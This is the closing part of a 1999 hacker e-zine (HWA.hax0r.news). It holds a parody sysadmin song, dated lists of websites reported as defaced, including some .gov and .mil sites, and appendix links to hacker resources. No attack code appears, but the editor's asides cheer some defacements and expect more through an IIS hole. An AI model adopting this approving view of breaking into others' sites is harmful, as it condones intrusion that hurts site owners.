I understand commands of pine, and how they hurt the human race.
About the pico editor I'm teeming with a lot o' bosh –
With many cheerful facts of how it's dumber than a Macintosh.

Everyone:
With many cheerful facts of how it's dumber than a Macintosh.
Unix Sysadmin:
I'm very good at showing users how to pick the best of tools,
I know I should avoid the nerds who hang out in the vestibules;
In short, in matters relevant to programs in slash usr bin,
I am the very model of a modern Unix Sysadmin.

Everyone:
In short, in matters relevant to programs in slash usr bin,
He is the very model of a modern Unix Sysadmin.

-=-

@HWA

SITE.1

@HWA

H.W Hacked websites
~~~~~~~~~~~~~~~~

Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed

* Hackers Against Racist Propaganda (See issue #7)

Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'...

From HNN rumours section http://www.hackernews.com/

see the archives section on HNN or attrition.org for copies of many of these sites in their defaced form.
http://www.attrition.org/

contributed by Anonymous
Cracked

Yet another busy weekend. The following sites have been reported to HNN as being cracked.

http://www.chatuk.co.uk http://maif.gov http://www.freakstudios.com http://cenwo.nwo.usace.army.mil http://www.qplanet.com http://www.qplanet.net http://www.gccnj.edu http://www.panthersfootball.com http://www.atlantabravesbaseball.com http://rsd.gsfc.nasa.gov http://www.bbutx.com http://fusion.library.mssm.edu http://www.depaul.edu http://www.jinxcorp.com http://www.fweebsd.org http://www.landersoil.com http://www.naturalbornassholes.com http://www.rug.ac.be http://sun.vdp.fr

June 8th
contributed by Anonymous
Cracked

http://www.zms.or.jp http://nt.oneworld.org http://icg.clarkson.edu

June 9th
contributed by Anonymous
Cracked

The following sites have been reported as being cracked.

http://kln.gov.my http://www.landfield.com http://www.420.net http://www.me.fau.edu http://www.zms.or.jp http://nt.oneworld.org http://icg.clarkson.edu

June 10th
contributed by Anonymous
Cracked

The following sites have been reported as cracked.
http://www.joshcomm.com http://www.usd.edu http://www.ioc.state.il.us http://www.alloweb.com http://www.coollinux.com

June 11th
contributed by Anonymous
Cracked

Things seem to have slowed down a little recently. HNN has only received reports that three web sites have been cracked.

http://programmingjunkies.com/ http://sol.marc.usda.gov http://index.ecu.edu

June 14th
contributed by Anonymous
Cracked

The following sites were reported as cracked over the weekend.

http://www.garufa.com http://www.ancort.ru http://www.cdiunesco.org.ar http://www.cenidet.edu.mx http://www.galvash.com.mx http://www.naboodesigns.cx http://www.foxintl.com http://www.bbay.com http://mail.edomex.gob.mx http://www.matrix.msu.edu http://index.ecu.edu

June 15th
contributed by Anonymous
Cracked

X-PLOIT TEAM has returned with reported cracks of Mexican Government web sites as they continue to fight against corrupt government, and for freedom of speech.

http://www.edomorelos.gob.mx

June 16th
contributed by Anonymous
Cracked

Things have seemed to be a little slow lately. Maybe because it is summertime. With the new IIS hole things will probably pick up. These are the sites that have been reported as cracked.

http://www.skinheads.com http://www.softlink.cz http://rs-nt-1.une.edu.au http://virtual.lead.org http://www.shoot-n-iron.com http://www.zophar.com

June 17th
contributed by Anonymous
Cracked

The following sites have been reported as cracked.

http://data3.gmu.edu http://www.highplaces.org http://ellzeymarine.com http://multilinkcom.com http://orion.web-hosting.com http://www.exo2060.com http://www.justmark.com

June 18th
contributed by Anonymous
Cracked

http://www.flavoredthunder.com http://nc-101.hypermart.net http://www.hansatreuhand.de http://www.aj.com http://www.wabba.com

June 21st
Cracked

It looks like it has been a busy weekend for some. The following sites have been reported as cracked. (Note: There are two .mil domains in this list.)
http://www.metro.seoul.kr http://pindar.ilt.columbia.edu http://www.fpac.fsu.edu http://www.gis.dk http://cob-distance02.colorado.edu http://shadowflax.cs.byu.edu http://www.castnetcom.com http://www.ies.ncsu.edu http://www.ruckstuhlgaragen.ch http://www.bpfa.com http://www.catalogcafe.com http://www.des.uwm.edu http://insite.net http://www.wabba.com http://www.bisnet.scsu.edu http://rs-nt-1.une.edu.au http://www.cityhackers.com http://www.hsd401.org http://fjsrc.urban.org http://www.communityofcaring.org http://lhi5.ifsm.umbc.edu http://uhec.udmercy.edu http://www.earthforce.org http://www.e-lawyers.net http://www.dancinghands.com http://www.coolkids.com http://www.aggerholm.com http://www.canada.org.mx http://www.mightymedia.com http://www.wib.lehigh.edu http://www.nswcl.navy.mil http://www.ntsc.navy.mil http://armstrong.scu.edu http://uhec.udmercy.edu http://www.ameralert.com http://www.autosportmag.com http://www.futuristicsound.com http://www.lyndalong.com http://www.netpay321.net http://www.ohioagent.com http://www.showcase-newhomes.com http:/www.eurobasket99.com http:/plan.arch.usyd.edu.au http:/bluesroom.co.za http:/seekerz.co.za http:/www.good-design.com http:/www.xpandcorp.com June 22nd contributed by Anonymous Cracked The following sites have been reported as cracked. http://lhi5.umbc.edu http://www.reg.niu.edu http://mnyouth.org http://www.dynamic-21.com http://www.ergointerfaces.com http://www.salcotoys.com http://www.teachertalk.com http://www.usd.edu June 23rd Cracked The following sites have been reported to us as compromised. http://hpws3.ihep.ac.cn http://www.atljf.org http://www.121trade.com http://www.bizzcity.com http://www.internetgate.com http://www.nflgameday.com http://www.orgplanning.com http://www.thanks-cgi.com http://observer.gsfc.nasa.gov http://www.ipub.com June 24th contributed by Anonymous Cracked The following sites have been reported as cracked. 
http://www.5aday.gov http://www.kukje.co.kr http://www.drysound.com http://www.internet-club.com http://www.justmark.com http://www.thanks-cgi.com June 25th contributed by Anonymous Cracked The following sites have been reported as Cracked: http://www.cpr-training.com http://www.magnaflow.com http://www.library.anl.gov http://www.industrialbikes.com http://www.monmouth.army.mil http://www.sterzing.com http://www.unicef.org.ar http://cis.georgefox.edu http://arcvirtualcampus.org http://www.musclecars.org http://www.habaco.com http://www.iphase.com http://www.arkon.net http://www.art-by-kaki.com http://www.dcclan.com http://www.heckerdesign.com http://www.nlac.gov.tw http://www.pixeled.com http://www.twilightsoftware.com http://www.cpac.org http://www.forpc.com.au http://www.orgplanning.com http://www.nethelpnow.com http://www.appliedcls.com http://www.craigcph.com http://www.damascusbakery.com ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html hack-faq Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html Original jargon file New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ New jargon file HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://packetstorm.genocide2600.com/hwahaxornews/ http://archives.projectgamma.com/zines/hwa/. 
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~

Foreign correspondents and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed

Belgium.......: http://bewoner.dma.be/cum/ Go there
Brasil........: http://www.psynet.net/ka0z Go there
                http://www.elementais.cjb.net Go there
Colombia......: http://www.cascabel.8m.com Go there
                http://www.intrusos.cjb.net Go there
Indonesia.....: http://www.k-elektronik.org/index2.html Go there
                http://members.xoom.com/neblonica/ Go there
                http://hackerlink.or.id/ Go there
Netherlands...: http://security.pine.nl/ Go there
Russia........: http://www.tsu.ru/~eugene/ Go there
Singapore.....: http://www.icepoint.com Go there
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. Go there

Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it.

@HWA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]
+++ ATH0